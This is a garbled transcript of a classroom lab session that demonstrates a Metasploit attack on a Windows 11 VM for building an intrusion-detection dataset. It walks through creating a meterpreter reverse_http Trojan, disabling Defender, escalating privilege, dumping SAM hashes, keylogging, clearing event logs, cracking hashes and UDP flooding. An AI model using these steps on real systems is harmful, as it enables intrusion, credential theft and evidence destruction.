टॉपिक डाला है ना बेटा, वो थोड़ी। Let me share my screen. So what we are going to do in this session, so we will perform use Metasploit to compromise Windows 11 machine, and then we will use it and perform some activities like creating a directory, listing the processes as you saw in the previous session. We'll also try to see how we can elevate the privilege and then dump the hashes of the SAM database. So I will first make sure that you understand the topology. Let me share my screen again. So as you can see here, so what I'm using right now. So this is the Oracle VirtualBox Manager, and I'm using Kali Machine, which comes with the pre-installed tool to perform pen testing and scanning. And then I'm using this Windows machine as a target where I will try to deploy the malicious application and then see how I can use it to list the processes, create a directory, delete a directory, and also dump the hashes of the passwords and everything. So we will see that, and also I will show you how you can like capture all these activities in the logs, in the I mean in your Wireshark analysis. So you can capture all these activities there, and then you can convert it into the CSV file, and then you can use it for analyzing it using large language models or some deep learning models that you can create. So let's start with Kali. So I will share the screen again. So if you remember, the first process step is to see what are the payloads that we have. So you can start the terminal by just clicking on this here, and then just you can type. I think you can see the screen. So let me. So you can just type MSF Venom, and it will list you like what you can do. So here it says that MSF Venom, a Metasploit standalone payload generator. So it generates payload or Trojan that for Metasploit, and you can use them to like and deploy them on some Windows machine and see how it provides you access on that system where it is deployed. So I'm going to clear this screen again, and then you can see all these different options. So for listing, so you can see here, it lists uh, all modules, types, our payloads, encoders, platform. So everything it will list. So let's go and use that MSF Venom dash dash list. So it didn't give me much. So let's use this one. Let MSF Venom and then list the payloads. So try that. So you can clear here MSF Venom dash dash list dash dash payload and see what it gives. So here dash dash list and dash payload maybe I'm tapping the wrong command. Just make sure. Let me check that whether the command is correct or so. You can just type, I think, let's clear this one so that MSF Venom dash L payloads. So I think it will list all the different payloads. So it may take some time because there are a lot of publicly available payloads. So all these are different payloads that you can see here that you can use and create a Trojan. So you can see all these are different kind of payloads. For Linux, you have the payloads for Android. For Apple iOS, you have the payloads. And this is the command msf venom dash L is to list and then the payloads. And then for Windows, you have the different payloads that you can see here. But we are interested into, let me go back here, down. Yeah, this Windows x64. So you can find it here. I think, yeah, this is the payload. So Windows x64 that you see here, Windows x64 meter predator underscore reverse underscore HTTP. So I'm interested into that payload to create a from that payload, and then we will deploy that in the Windows machine, and then we will see that how it establish communication with the command and control server. So I think no, this is also connect back to the attacker and spawn meter predator shell, and here also this, I think this is the payload. Windows x64 meter predator and then reverse underscore HTTP, and it says inject the meter predator server DLL via the reflective DLL injection payload requires Windows XP or Service Pack 2 or new Windows to work with this payload and tunnel communication over HTTP with the command and control server. So you can experiment with different payloads also. So you can experiment with different payloads, and also what it will help you to generate a different kinds of activities and traffic on your Windows machine, and which you can capture and use it to perform some analysis using a large language model. Let's go back again here and let's use it to create a Trojan. So let me check the command actually. So, so what you can do, let's MSF Venom, then dash P. Dash P is it for the payload. So let me just clear everything and then type. So now we will use one of the payload to create the Trojan. So just type MSF Venom and then dash P is for the payload that we are going to use. And we are going to use this reverse underscore HTTP. And also before doing that, make also note down the IP address of your Kali machine. So what you can do, type if config and you will get to know about the IP address of your Kali machine. So it is 10.0.2.7. So note down that and then you can use it. Let's go back here again, which terminal it was. I think I have cleared that. No worries. I will type again. MSF Venom. Then dash P signifies the payload. that I will be using, and then Windows x64. So or this is the payload, meter preter reverse underscore HTTP. So what you can also do before performing this activity, you can try and find the information about the payload. So there is another command for doing that. So what you can do, just type this. Let me show you, because then you will know how to find LPORT. MSF Venom dash dash list and dash option, then dash P Windows. So this is the it will give you all the options that comes with this payload, and then dash P signifies the name of the payload. So I'm typing the name of the payload. So that is Windows x64 meter meter slash reverse underscore HTTP. And then it will list all the options. So you can see here advanced options for this payload are these ones. So, but we are not going into that detail. You can explore that. So what are the evasion options for everything? So now here you see that this is the name of the payload, Windows x64 reverse HTTP is stager, and module is in payload Windows x64 meter preter reverse HTTP, and it works on Windows x64 architecture, and who developed this payload. So the name of that person, and then here you will find this L port. So when you are using this payload, you have to use this payload port, which is port 8080. If you will give any random port, then it will not work. I mean, you will be able to create the payload, but it won't be able to communicate back with your command and control, which is running on your Kali machine. So you need to provide the L port, which is mentioned here, and then you need to provide the L host. So L host is lived as blank because L host can vary for different machines. Or if I am running it and my Kali IP address is 10, let's say 10.0.2.4 or 2.7, then I will have to provide that IP address, and but the port should be the same. This reverse shell, this Trojan communicate back on port 8080. So now what you can do, we can go and try to create the Trojan using MSF Venom command, MSF Venom dash P, then Windows x64 meter filter dash reverse underscore HTTP, and then provide the IP address of my of your Kali machine. So in my case, it is 10.0.2.7, and then provide the L port as port 8080, because this payload communicates back on port 8080, and then what kind of file I want to create. So that is the file is exe, and then I have to provide the indirection. So indirection, and then you need to provide the name of the Trojan that you want to the name it. So and if you will not provide and just hit enter here, the Trojan will start running on your Kali machine itself. So that is doesn't make any sense. So you need to provide the indirection operator, and then uh, name the Trojan. So let's say give it uh, kit exe, and then hit enter. So now this Trojan has been created using this command. So this is the tool MSF Venom. I'm again repeating, and then the dash P is the signifies the name of the payload. So the payload is Windows x64 meter preter reverse underscore HTTP, which will help us to establish a reverse shell from Windows to our command and control machine, in this case, which is Kali. And then L host signifies the IP address that you have to provide IP address of your Kali machine. So in my case, it is 10.0.2.7. And then L port, it comes already, I have shown that when you will hit that command MSF Venom dash dash list dash option, then and the name of the payload, then it will list all these options here, and you can find the L port information from here, port 8080. And if you do not remember these commands, you can always write it down at one location, that what are the common or general commands that I will have to use when I'm performing these kind of activities. So you can note it down also. And then you have to provide the type of the file that you want to create. So I'm creating exe file, and I have given the name exe, and then the name of the Trojan. So I have given kit.exe. And now we also want to see where that Trojan is created. So it is generally created in this home directory. So this is my download folder. You will not find it here. And let's go in the Kali, and here you will find this Trojan somewhere. So you can see here kit.exe that is in my Kali home directory. So it is created here. And now the idea is to copy this Trojan on my Windows machine. So if you are performing this like for the first time, and especially you are testing Windows 11, so all these payloads that you see here, let me go back again at this. So all these different payloads that you we saw on one of our machine, let's MSF Venom dash L. So all these payloads were designed for Windows 10. So you can still use it for Windows 11, and that is perfectly fine. It will work. But Windows Defender has more aggressive security with Windows Defender. That was not the case with Windows 10. So what you can uh, do, you can turn off the Windows Defender and then try running this. So let's go back, and because the idea is to first know how these tools or these payloads work. Later on, like with different obfuscation techniques, obfuscation tool, you can try to see whether you are able to bypass the Windows Defender or not. So there are different tools. I'm not going into details of those tools. It is called Whale, that you can take a look into that. There are some other tools as well to obfuscate these uh, payloads, Trojans, more in a more effective way, and then you can see that you can bypass the Trojan. Let me show my Windows machine. Wait. So what you can do on your Windows machine, you can go into Windows security. and especially in the this virus and threat protection. And you can, what you can do, you can turn off some certain things like a real-time detection, which is always, most of the time it is on. Once you will shut down or restart your Windows 11, this real-time protection will turn on automatically. And also you can turn off this cloud delivered protection, automatic sample submission, tamper protection, everything. And firewall doesn't matter a lot in this case, but you can try turning off the firewalls. So I have turned off those. What you can do, like go here, domain network, and just turn off the firewall. But main thing is to turn off this virus and threat protection. And then you can close this. And let's go back again on Kali. Let me share the screen again. Just wait. Screen. So what you can do here, you can use this command sudo scp. Let me type it on a different terminal so that it will be more visible. So you can type sudo scp to copy this uh, Trojan that we have created. So it is in the home directory. So what you can do, just type git.exe, and then, so I think, was it, yeah, git.exe, and then the username of your Windows machine. So in my case, it is user, and then we have to provide the IP address of our Windows machine. So in my case, it is 10.0.0.2.15, and then you can just type this double colon and slash. And you should also note down the Windows uh, uh, IP address. So how you can do that? I have mentioned it previously, but I am again showing it. Go and click the CMD, and in Windows, you have to type ipconfig. And then you can note down the IP address. So here you can see that it is 10.0.2.15. So this is the IPv4 address that which is the IP address of my Windows 11 machine. So now I can minimize this and again go back on Kali. So you can see here I have given this command sudo scp kit.exe and the user name of my Windows machine, and then the IP address, and then I can hit enter. So first time it will ask the IP credential of my Kali machine. I hit enter, and then the credential of my Windows machine. Now this file has been copied. Now let's go back and check it on our Windows machine. So let's go here. So you can go in the C directory, and you can see here in the C directory, by default, it is directly deployed in the C directory. It is a 7 KB very small file. So what we are going to do now, we will start the handler on our Kali machine, and then we will run this, come back again on Windows machine, and we will run this application. So let's go back on Kali machine. Yeah. So to start the Metasploit, there is a command. You can also find it here in the application section. Just type Metasploit, and this is the Metasploit framework. You can also directly click on that, but I am going to use the command. So use this sudo, and this is msf db and init, and then we are going to start the msf console. And now it will start the Metasploit framework. So now you can see that Metasploit has started, and this is version 6. So now the first thing that we need to do, if you remember in the slide, we need to start the handler. So let's go back and check on the slides. So here, so after starting the Metasploit, and copy this. What we have to do, we have to start the handler. So we will need to provide these commands. Use exploit multi-handler. So we need to start the handler. Then we need to provide the set the payload that we are going to use. So in our case, we are not going to use TCP. We are going to use HTTP, reverse HTTP. And then we need to provide this L host and L port. So let's go and do that first. So in this MSF console window, you have to do that. So type use exploit slash multi slash handler. So you have to provide this command to first start the handler. So just after typing this, what you can do, you can hit enter. And then in the second step, what you have to do, so you need to set the payload. So for setting the payload, I mean the payload that you are going to use for this handler. So we need to set the payload. So set payload, and then we need to provide the name uh, of that payload, Windows x64 meter reader, reverse underscore HTTP. So you can again verify whether you are providing the correct name or not. So it is important to make sure. So this is the name of the payload. If you see here, Windows x64 meter printer reverse underscore HTTP. So that is correct. Let's go back again. So this is the command. So to set the payload for this handler, so we are going to set payload Windows x64 meter printer reverse underscore HTTP. And once you have set that, then next step to provide the IP address of your Kali machine for this handler. So how you can do that? So this is the command. So L host is your local host. And then the IP address of my Kali machine is 10.0.2.7. So again, what you can do, you can verify that whether it is, so this is the IP address of my Kali machine 10.0.2.7. So I can provide this IP address for this handler again. So 10.0.2.7 is fine. And then you have to set the port. So if you remember here, let's go back again here. So the L port is port 8080 for that payload. So what we are going to do, we are going to provide this port information to this handler. So at set L port 8080. And now all the requirements are set, and we can type run to start the this MSF console. But before hitting enter, let's go back on Windows machine and start this Trojan. So let's go back there again. So you can see this Trojan. So what you can do, you can double click it, but I would suggest right click it and run it as an administrator. And it will ask, do you want to allow this app from unknown publisher to make changes? So I know that, yeah, I have created this application. So I can just click yes. And now what I can do, I can go back again on Kali and hit enter. Let me. So now you can see that I hit enter on my after the run command, and now the meter predator shell has been established with the Windows machine through that Trojan, remote access Trojan. So what I would also suggest for doing a project here, let me go back on Windows machine and start the Wireshark. So you can go here.
Yeah, it was like I got
And you can also start the Wireshark. You can see the communication, the HTTP communication between 2.15. So the source was 2.15 because the remote access Trojan ran on 2.15 and sending traffic information back on 2.7. So now let's go back and see what else we can do there. So you can type help and it will give you all the activities that you can do here. So you can see here, you can kill the background processes, close the channel, also here, list the processes. I think there is somewhere it is mentioned. You can find it in this core command, and also you can delete a specified file. You can download a file or directory. You can copy source or destination file. You can create a new directory, remove new directory. All these commands you can find. You can net stat, display the network connections from Windows machines. Also, what you can do, you can list the processes, as you can see here, list of running processes on Windows machine. You can kill those processes through terminate a process by name. So everything you can do that. And also you can elevate the privilege. So to elevate the privilege, what you have to do, type get system dash t and wait. Sometimes it will work, sometimes it will deny. So but for instance here, when you got this information that got system via technique one, so that means we have already got the higher privilege. So that means as an admin rights, I have elevated it from the user to admin rights. And now what we can do, we can dump the hashes. So you can see here, this is commands, this will dump the contents of the SAM database. So let's try to do that. And so this is the hash that you see here. So these are the hashes from the SAM database. What you can do, you can copy these and let's uh, paste this into some directory. So you can create an empty file and let's name it project. And then you can open it and paste this, and then you can just save this file. So let's save it. So make sure that your file is saved. So yeah, it is saved. And now again, let's go back on the terminal. And also what you can do, you can list the running processes. So let's try to list that. So just type PS and it will show you all the running processes on the Windows machine. So it may take some time because there may be uh, uh, large number of processes running. So it timed out. So let's try something else. So you can like start key stroke capture. So to do that, type this key scan underscore start. So let's try key scan underscore start. So it is a starting keystroke sniffer. And sometimes what will happen, it will timed out. So maybe the connection is timed out or connection is not working properly. So you can see that it is getting timed out. So let's try again. So maybe what you will have to do, you will have to start the Trojan again if it is getting timed out repeatedly, or maybe you because maybe sometimes connection is getting blocked or broken. So if it is taking that much of time, so that means the connection has been broken. So let's go and see what we can do. So let's go and start the Trojan and run the Trojan again and see whether it is working properly or not. So let's first try to run it again. And now let's go back. Kali. So now let's try the PS command. And if it works, that means action is working fine. Otherwise, what you will have to do, you will have to start the meterpreter shell again. So if it doesn't work out and it constantly giving the same timeout, so now let's go and start this again. So you need to exit this session and again start the meterpreter shell. So let's do that again. So what we can do here, let's use this like commands again. Here use exploit. So let's try from here. Slash multi slash handler. And now set the payload. Windows
Realmente
64. Enter. underscore firewalls underscore HTTP, and then set the al host 7, and then set al port. And now let's type run, and let's go back and again run the Trojan to make sure that connection is properly established. Once we have started that, let's and even if it doesn't work after starting it again, what you can again do, just go and but you can see that it has opened the connection again. So now let's try to use PS and see. So this is the command that I typed PS, and it listed all the running processes on the Windows 11 machine. So these are all the different processes running. So now let's go and open the browser on the Windows machine, and let's try to open the Google. So I'm using Microsoft Edge. Let's try to use some open website. And once it is open, so now let's go back on Kali machine, because Microsoft Edge was not running. So now let's run this PS command again and see. Now it should show. So now you can see that MS Edge is running here. That application which was not running earlier. So now we want to kill this process. So let's say we want to kill this process. So if you remember here, there is a command. So what it will do, pkill, it will terminate processes by name. You can also terminate process by process ID, but let's do it with the process name. So use this command pkill, and we want to kill this MS Edge, which is Microsoft Edge. Do not try to kill any random process, because if you will kill the random process, and you can also see that kit.exe, that is also working. So that is also a running process. And you can see all the directory from where these different applications are running. So let's try to kill this MS Edge, because if you will kill any random process, it will make your Windows unstable. So do not try to perform that. So let's kill MS Edge and see what it does. So now it has given that killing MS Edge on killing 304. Sorry. So these are the processes ID of the MSH 3052, 360, 5668. So all these processes are killed. Now let's go and verify that on Windows 11. So you can see that Windows 11 is not open now. So we will have to start it again. So it has been closed now. So that is the way to kill the process. And now let's go back again on Kali. Now let's try to perform a key scan activity. Key scan. So that will log all the key logging activities. So now it has been started. So now let's go back and type something on Windows machine. So let's open the Microsoft Edge again. And let's use GitHub. Open the GitHub. So what generally attackers do, they will deploy these kind of Trojans, and let's say they will, uh, I'm typing any random thing and any random. So what they will do, they will deploy these kind of Trojans that will also capture the keystrokes and everything. And then they will try to inf get the information back, like username and like email and passwords and everything. So let's go back, and then we can dump the key scan underscore dump. So now you can see that it showed that I opened that and typed this Google. I also typed GitHub, and I typed this random thing and at Gmail, and then in the, so from these things, these keystrokes and keylogs, attackers can analyze these informations, and then they can plan that, yeah, these are the username, I mean the email address and the password, and it might be related with GitHub because GitHub has been just typed above. So all those informations, attacker can find this out from these kind of keystrokes. So now let's stop this key scan activity, and let's type help again and see what else that we can do. So of course we can also shut down the system, but I'm not going to do that. Or you can also reboot. So you can create a directory like mkdir, you can type, and it will create a new directory on the target machine. And let's say we are creating a directory. So let's see where it is created on the Windows machine. Let me open that. So you can see that here this UIS directory is created, which I just created through my meter shell. We can also remove those directory. So to remove that, this is the command rmdir, that you can remove the directory. So just type rmdir UIS and it will be removed. So that directory has been removed now. So I'm not interested to go back there again. So now let's go and see some networking. So what you can also do, use this netstat command and display the network connections. So let's run that and see whether what information it displays. So it displays all the like the different local addresses here on that machine, which is communicating on a specific port through their specific port and to a remote address. So this is some public IP address 4.2. So maybe there is some application. So maybe, yeah, this is the application, which is maybe my machine, that is Windows machine. It is communicating with this IP address, and the application which is running on my local machine is SVC host, which is communicating with this remote IP address. So this remote IP address is associated with Microsoft mm, data center IP address. So this application SVC host, what it does, it search for the updates and from Microsoft, and so it communicates on this IP address. So you should always try to see what are the applications running from security perspective also on your machine, and whether you identify whether you know any application. So if you see any unknown applications which you are not familiar, you should always try to see where it is communicating back and which protocol. For instance, let's say this is the Trojan, and I have never seen this in my Windows machine, and this is the first time that I am looking at. So and also check the IP address. So maybe this is the IP address. Maybe this is 10.0.2.7 because I know that, but it can be some public IP address hosted on some CDN like Microsoft CDN or Amazon. So you should always verify those what is the application and where it is communicating. And if you do not know, always try to kill those applications and scan your whole system. So that is also the way. So maybe your Windows Defender, let's say, or any anti-malware protection, anti-virus protection tool that you have, it may not work. So maybe it has missed that. So if you are using these kind of Windows internal tools, so you can run these kind of netstat also on your Windows machine. So it is not necessary to establish a meter Peter shell and then run that. So you can directly run these kind of tools on your Windows and identify what are the applications running there. And if you see any suspicious applications or unknown applications which you do not know, then always try to investigate that from security perspective. So you can close those things. So along with anti-malware protection tool that we use, antivirus tool, it is always good to also use Windows internal to identify any malicious applications. So maybe those third-party tool will miss that, but through Windows internals, you can identify the processes running, sub-processes, or and their parent process and where it is communicating back. And if you see any suspicious activity, always close that and investigate the logs. Let's see what else that we can do. So you can do a lot of things here. Screen share, you can always do that here. I'm not going to do that. You can explore that yourself. System information, you can find that. And also know that if you leave this terminal command and control idle for long time, the communication will break down. So maybe this communication has long, you can see that the time it timed out. So you can keep doing something and then you will this terminal will be active. So what I'm going to do that now, I'm going to exit from here.
Rishikesh, can you explain that how we can save the information that we are collecting?
Yeah, I
In
will show that. Yeah, I will show that. So
CSV is
this is
okay
the
for us.
like, yeah, what like we used the Trojan and we deployed it and performed some activities. So what you can also do from project perspective, you can use these. If you remember from previous sessions that you can use these tools also to launch like 10.0.2.15. 15. 0.2.15. 0.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2.15. 0.2 dash dash. Let's do it again. Sudo hping3 dash dash flood dash dash udp and 10.0.2.15. So I'm launching UDP flood attack. So parallelly, for instance, you can open one or two terminals or three terminals and then launch these kind of attacks also, and you will have a very rich data set. So Wireshark is already running there on my Windows 11 machine, and all the traffic will be captured. So now I'm closing this. And for instance, what you can also do, let's start the ZenMap. Also, you can also perform the same activities that way. Let's do that here. Sudo. So not sudo, just type ZenMap. And then just type here 10.0.2.15. And let's perform quick scan. So all these things parallelly you can do. So now it is done. Host seems to be down. So now I think it was shut down just because too much traffic was sent by uh, that flooding. So let's start it again. So as you see here, I didn't know that that Windows machine has shut down. So when I ran that ZenMap, it showed me that the host is down. So let me start it again. Just wait for a minute. My Windows machine is starting. So in the meantime, when it is starting, so what you can also do, like, so I have saved that file on my Kali desktop. So let's use the Zone the Reaper tool and see how it works. Uh, yeah. So what you can do, sudo zone, and then the name of the file that you have to provide. So first thing is to change the directory because it is not
Unable
in the
to
home
see your
directory.
screen.
Oh, it is not shown. Okay. I think now you can see the screen.
Thank you.
Yeah. So we need to change the directory because the file is not in my home directory. It is on the Kali desktop. So you need to change with cd desktop, and then what you can do, just type sudo John and then the name of the file. So name of the file is project, and then sorry, the project, and then we need to provide the format. So format is dash dash format, and it is empty. It may take time. It is taking time to identify that. So sometimes it uh, does it quickly, sometimes it takes time. But that is the command to run this John the Ripper tool, where you have a store and you need to supply the name of the file where the hashes are saved, and then it will try to identify the clear text from the hash, and it will show it here. So, but that is the process. So let's go back on Windows. Since the it was shut down, so I think everything that we captured in the Wireshark was not saved. But I will show you how you can. So what you can do, you can run those tools, and let's say let's go back there. So what you can do, you can run the Wireshark and perform all those Trojan activity again. I mean, because everything was lost. So let's say you have deployed the Trojan and everything, and then you have started the Wireshark, and then what you can do, once you have performed all those activities, you can just stop it, and you can click here, and you can select the file. Since you want to, let's say, save it in the CSV format, so select these files, all the packets, I mean, and then click here, export specified packets, and then from there you can name it and save it as a CSV format. So it is not showing it here. Let me check that whether it is saved. So let's select everything and then click that and export. Yeah, export packet dissection, and just click this as CSV. And then you can name this file, and everything will be saved in the CSV, because since you are interested into CSV for analyzing it using large language models. So that is the way you can do that. So what I would suggest, uh, create a Trojan, deploy it on your Windows machine, and then perform all those activities, and run the Wireshark, and also quickly launch HPing and close that, because it floods the traffic very quickly. So maybe if the virtual machine has not enough resources, it will shut down. So perform that quickly, and then parallelly perform the scan through the ZenMap, and you will have a good data sets that you can start in the beginning. You can save all those data as I mentioned here. Just select all the packets there, and then click on export dissection, and click here as a CSV, and all things will be saved in the CSV format. And then you can use it for analyzing it through some large language models that you want to use. And also, I just want to show that quickly. I forgot to mention that when this was running. So here you can see that. Let me go back. So I mentioned in the morning about clearing the logs. So you can use this clear EV command. And what it will do, it will clear all the event logs. So when the terminal that handler is running, what you can do, just type clear EV from your Kali machine, and it will clear all the
To see
Windows
your
logs.
screen, Rishikesh.
Oh, sorry. Just give me a sec. So you can see here this clear EV command. So when your meter feeder shell is running, what you can just do, just type this clear EV command, and it will clear all the event logs from your Windows machine. So all the logs in the Windows event viewer, it will be deleted. So you can use this to clear all the event logs. So that is like align with what we saw in the morning, that once you have performed all those activities, like you have dumped the hash of the password, you have uh, let's say deleted some process, you have created some directory, you have copied some files in that, or copied some information, and you have copied back all the files on your command and control servers, and you have captured all the key logs. Then let's say you want to clear all the event logs, then you can just use this clear ev command and delete all the logs from your Windows machine, and then you won't have any logs in the event viewer. So that is the way to do that. And then I would for the project, I would suggest, when you are creating the Trojan, when you have created the Trojan and deployed that, and when you start the Meterpreter shell, parallelly start the Wireshark also, so that you will have data with UDP flood. Like you can launch TCP flood, which will be slow, and it will not make your system shut down, because in virtual environment, maybe if you are running UDP flood, if resources are not enough, your system will shut down, or it will become very unstable. So what you can do, you can run TCP sync flood, and quickly launch UDP flood and close that, because it flood the traffic very quickly. It can send millions of packets very quickly. So use that tool, and also use ZenMap to perform the scan, and then save all those data in the CSV format that I showed you. Let's go back here on Windows machine again. While doing all these activities, keep running your Wireshark, so that you will have the packets related with Trojan activity, UDP flood, TCP sync flood, your scan activities. So all those packets will be there. Even you can try to launch vulnerability scan using OpenVAS, and then you will have a very good data sets. So you in the beginning you can start, and parallelly you can do some more experimentation with different attacks, and you can keep enriching your data sets, and then you can use some large language models that to analyze that, and get the insights, and see also see what are the features that are relevant. For instance, for Trojan activity, let's say, so try to analyze through LLM or any deep learning model, what are the features which can be important. For instance, we already know that reverse shell communicate backs on port 8080, and that is the pattern. So maybe the port is very important for getting those information about a reverse HTTP shell. Protocol can be important because it communicates through HTTP. For UDP flood, what can be the information? The source port, you will see a random source port very quickly, and destination port may be the same, or maybe the destination port will also vary, but it will be not varying as the source port. And then you will see the protocol that can be very important, like whether it is TCP or UDP. In case of UDP, you will see UDP protocol. And then in the case of flooding attack, you will also see that timestamp is very important, because in the very short timestamp, you will see that there are a lot of packets. So that also signifies the flooding attack. And similarly for scanning, what can be the important features or information? For instance, the port information, the packets that are sending, like let's say the TCP, and it tries to identify what are those services or ports running. So maybe our machine is sending back some information on some particular port. So maybe the destination port, source port can be very important. The protocol can be important, and source IP address. So try to analyze using some large language model or deep learning models, these data sets, and try to see in case of different attacks, what are the different characteristics or features which can be relevant. And then you can use those to build your own intrusion detection system classification model to classify different attacks. So that is a initial idea that you can start with, and then later on always we can work on that and make it more robust and uh, effective. So again, I'm just trying repeat this how you can copy this like all the traffic information in the CSV format. So just remember that select hit like select one packet and then press your shift button and uh, down arrow button and select. Let's say I'm selecting all the packets. I want to select all the because I want to analyze everything. So just do that and then use this export packet dissection and then click here as a CSV and then name it and save it as a CSV file. And then you can use it for the analyzing using large language models that you are working with. So I'm stopping it here and
If you
let's
can save this, oh, okay.
yeah, yeah. Go ahead,
Did
Sumit.
you save that file in CSV? Save that section and send me if possible.
What I will do because my machine was shut down. What I will do, I will run this experimentation again and I will share the CSV with you, and then
To
you can
see
use
that
this.
what kind of results are gathering and how we
Yeah,
can
yeah,
solve.
yeah.
Okay.
I will do that.
Though we have clean data, I gave the students, but I want to
Yeah,
see the raw data. Okay.
yeah. I will say send that. I will run the experimentation again and I will share with you, and then we can use it for the analysis. Let's go back and take the question. So the payloads are the applications which we can use to generate the Trojan. So it keeps these are the applications created by different people, and what it will do, it will analyze the systems like the all the activities, and then it will send back all those information to some command and control server. So that is the role of Trojan. So we can use these payloads and create our own Trojan from that. So these are the payloads that can like we can use it, provide the IP address of our command and control server and the port information on which it will communicate back and create the Trojan, which can be like then we can deploy that. And then once we deployed that application, the payload will be active. And as you saw that it was sending some traffic back to my Kali machine and it will do that. And yeah, how does the interpreter establish the connection between attackers? So for doing that, as I mentioned earlier, you have to create the Trojan first and then deploy that Trojan on your Windows machine. Then start the handler on your Kali machine and then run the Trojan there on Windows machine and it will establish the connection automatically. I will share some more blogs and for this one. And as I mentioned that what you can do, you can run all these different attacks that we have gone through in the past couple of days. And you can run the Wireshark and capture all those information. And also, when you are capturing the information and you want to save it in the CSV as you are working with some large language model to analyze it, but also save it in the PCAP format. So that will be also useful if later on we want to extract some information or anything, it can be really helpful. So let me know if you have any more questions. I will share my email address, I think. But I would suggest first to like uh, perform these different attacks, create your own Trojan like reverse TCP, HTTP. You can also create some different Trojans so that you will also have different types of traffic on your data set, and also run the scanning, vulnerability assessment, denial of service attack, and at least you will have five, six, six, seven. I mean, you can have more attacks also, and then save this and try to build some use a large language model and see what are the information which can be relevant for detecting different kinds of attacks. And later on, that is the first step to like analyze those logs, packets, and get some insight from the LLM, and then use those insights to build your own classification model to classify different types of intrusion detection, like intrusion activities, so that you can do that. Hack and Metasploit under other methods to make a basic. Yeah, you can use that in your own virtual lab. So that is perfectly secure, but do not use it and the payloads or Trojan and deploy it on some systems which is servers used in the organization. So just use it in your own virtual settings, and that is perfectly fine. If you do not have any other questions, then we can stop here, and I will share the data set with you, Sumit.
Rishi sir, kindly share the PPT with Sumit sir and the first session
Yeah.
PPT. So that,
Yeah, I will
Yeah.
share all the PPTs.
yes, you can
from-
share with Sumit sir, and then I can share
Yeah,
with it.
sure.
The
Sure.
last question is different. Can you read it properly? Because a
Which
student
one?
wants to do some project and you want your suggestion.
Is it safe to use the system hack and Metasploit and other methods to make a basic project? Yeah, it is perfectly safe. I mean, you can do that.
The last line.
Can you suggest me how to make a better project in this field? So you can start with Metasploit framework. You can try to use different payloads. So as you saw that there are a lot of payloads in that. Try to use different payloads and see what kind of traffic that you are getting in the Wireshark also, and how those, it will also help you in understanding. I just showed one payload. You can use and see different payloads, how it works. That will also give you understanding about the different payloads. And then what you can also do, I have not gone used this year. You can use there are custom GPT developed by different people for using pen testing activity. And you can also see how you can use those to perform pen testing activity for your own project. So it can help you with all the planning stage, assessment, and other things. So that is also one possibility that you can do. But I would suggest first try to get your hands dirty with the known things that I showed you today, and then use some other payloads that are there. There are a lot of payloads for the Windows. So use different payloads and see what type of activities that you are able to perform. So that will also give you some other insight, and that is a project in itself. And then maybe if you want to integrate it with the large language model, then definitely you can capture all those traffic details and then use large language models to analyze the different payload activities. So that is also an initial or basic project that you can do. I have already shown how you can make a custom payload. It is already, I think, recorded, so you will see that, and I will share the slides with you. So if you do not have any other questions, then I think we can stop here. What is this ROR IP? I will have to check this. Yeah, that router IP is fine. So you can use that. But I would suggest just set up your own virtual lab using Windows machine and try to use first on Windows rather than a router or firewall. So use your own, set up your own virtual lab with Windows 11 or Windows.
Rishikesh, you are telling virtual lab, but what is the meaning of virtual lab? They want to create some, they want to join some two or more systems, or only one system is sufficient? Because we can install a different operating system in a single Linux.
So for the virtual lab, I mean like you can install first the Oracle VirtualBox and you can download different like Kali you can download, you can install Windows 10 or 11 that I showed that. And you can also install some previous Windows version like Windows 8 also that you can install in your Oracle VirtualBox. And then in that settings, I would suggest first to perform these kind of activities so that if you unintentionally did something wrong, it will not impact the other infrastructure. So let's say you are doing in some labs and then unintentionally you did some misconfiguration, so it can impact the system. So it is safe to first download these virtual box and then download these VMs and install these VMs in your Oracle VirtualBox and then perform these activities.
From a student side. Tomorrow.
So can we stop here?
Yes, we will meet tomorrow. Okay. Okay. Thank you, Rishikesh.
Thank you so much. Thank you, sir.